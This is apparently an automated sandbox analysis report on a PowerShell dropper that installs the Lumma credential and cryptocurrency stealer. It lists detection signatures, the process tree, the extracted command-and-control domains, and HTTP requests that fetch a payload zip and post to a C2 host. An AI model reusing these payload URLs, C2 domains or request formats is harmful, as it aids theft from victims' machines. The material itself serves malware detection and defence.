Edit tour

Windows Analysis Report
lumma.ps1

Overview

General Information

Sample name:	lumma.ps1
Analysis ID:	1581568
MD5:	58b145c18d1f4eb4fb62ea55c7453a7c
SHA1:	72318f9c192da3aef8da5fd5e18285f6db38c990
SHA256:	a3da280337b0db1587a58dbbe52e24440688c75c9b4a2777d589b35d8832ae6a
Tags:	lummastealerps1user-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Powershell drops PE file

Sample uses string decryption to hide its real strings

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ronwod.exe (PID: 7712 cmdline: "C:\ProgramData\extract\ronwod.exe" MD5: 63FF0C8E75AA669F22E79EBF017C0AA8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "lackadausaz.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "IRiaFi--26dek1"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.ronwod.exe.1440000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.ronwod.exe.1440000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.ronwod.exe.6c520000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ProcessId: 7428, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7428, TargetFilename: C:\ProgramData\extract\cr.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ProcessId: 7428, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:16:11.538858+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.198.222	443	TCP
2024-12-28T09:16:13.900016+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.198.222	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:16:12.299037+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.198.222	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:16:12.299037+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	172.67.198.222	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:16:04.232944+0100	1810000	1	Potentially Bad Traffic	192.168.2.4	49730	104.21.64.85	443	TCP
2024-12-28T09:16:07.695290+0100	1810000	1	Potentially Bad Traffic	192.168.2.4	49731	172.67.167.249	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://druster-master.com/gogolend1.zip

Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.ronwod.exe.6c520000.2.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "lackadausaz.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "IRiaFi--26dek1"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\extract\ronwod.exe

ReversingLabs: Detection: 43%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: hummskitnj.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: appliacnesot.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: screwamusresz.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: inherineau.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: scentniej.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: rebuildeso.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: prisonyfork.buzz
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: lackadausaz.click
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: IRiaFi--26dek1

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\extract\ronwod.exe

Unpacked PE file: 2.2.ronwod.exe.1440000.1.unpack

Source: unknown	HTTPS traffic detected: 104.21.64.85:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.222:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0147D9C1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h	2_2_014800C0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2]	2_2_0147D0D9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	2_2_0144A8B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]	2_2_0144CC75
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]	2_2_0144C942
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_01462140
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	2_2_0147F150
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	2_2_0144C158
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax+00000960h]	2_2_0145C119
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	2_2_0147E920
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	2_2_0147E920
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	2_2_0147E920
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_01459930
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	2_2_01459930
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]	2_2_01459930
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	2_2_0147E9D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	2_2_0147E9D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	2_2_0147E9D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea edx, dword ptr [eax-00001099h]	2_2_0147B1D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	2_2_014691B1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]	2_2_01466990
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	2_2_014691B1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h	2_2_0147F040
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0146B841
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0146904E
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	2_2_01464060
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_01464060
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then add ecx, edi	2_2_0146B00F
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	2_2_0147E820
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	2_2_0147E820
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	2_2_0147E820
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	2_2_0147E820
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_014590D1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	2_2_0144C08B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h	2_2_0147B8A0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	2_2_0147FB10
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah	2_2_0147FB10
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0147DB39
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea edx, dword ptr [eax+00000960h]	2_2_0145C3F4
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	2_2_01469A43
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	2_2_01468A4D
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	2_2_01469266
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	2_2_0147EA60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	2_2_0147EA60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	2_2_0147EA60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_01460A20
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]	2_2_0144DA8B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	2_2_01465A90
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]	2_2_0144A2A6
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0146BD77
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh]	2_2_01449570
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h]	2_2_01466520
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then jmp edi	2_2_0144A533
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]	2_2_0146D5E6
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]	2_2_014685E1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	2_2_014685E1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]	2_2_0147CDF0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then add eax, 10h	2_2_014595FD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	2_2_0145BD8F
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	2_2_01463C40
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_01463C40
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]	2_2_0147B450
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h	2_2_0147F450
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then push eax	2_2_0147DC5E
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	2_2_01480400
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_01447410
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_01447410
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov dword ptr [edi], 60296828h	2_2_01464CCD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [ebx+eax*2]	2_2_01464CCD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	2_2_014804D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	2_2_0146B48C
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	2_2_01455F4C
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h	2_2_01456777
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]	2_2_01465770
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then add eax, 10h	2_2_014595FD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	2_2_0147FF00
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	2_2_0147E710
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	2_2_0147E710
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	2_2_0147E710
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	2_2_0147E710
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0145B729
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_0146C7DD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_01469F80
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	2_2_0147F780
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]	2_2_014577AD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_01448E50
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	2_2_01480650
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_01461E60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_01474E60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	2_2_01463675
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_01463675
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	2_2_01469630
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0146BE3B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	2_2_01463EC0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_01463EC0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]	2_2_014786C0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0146BE86
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	2_2_01455E8C
Source: C:\ProgramData\extract\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0146BE9D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 104.21.64.85:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 172.67.167.249:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.198.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.198.222:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: lackadausaz.click
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz

Source: Joe Sandbox View

IP Address: 172.67.167.249 172.67.167.249

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown

DNS query: name: iplogger.co

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.198.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.198.222:443

Source: global traffic	HTTP traffic detected: GET /gogolend1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: druster-master.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1EnxJ4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iplogger.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lackadausaz.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /gogolend1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: druster-master.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1EnxJ4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iplogger.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: druster-master.com
Source: global traffic	DNS traffic detected: DNS query: iplogger.co
Source: global traffic	DNS traffic detected: DNS query: lackadausaz.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lackadausaz.click

Source: powershell.exe, 00000000.00000002.1791490853.0000020112531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://druster-master.com
Source: powershell.exe, 00000000.00000002.1791490853.00000201126B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.co
Source: powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1791490853.0000020110A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1791490853.0000020110A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
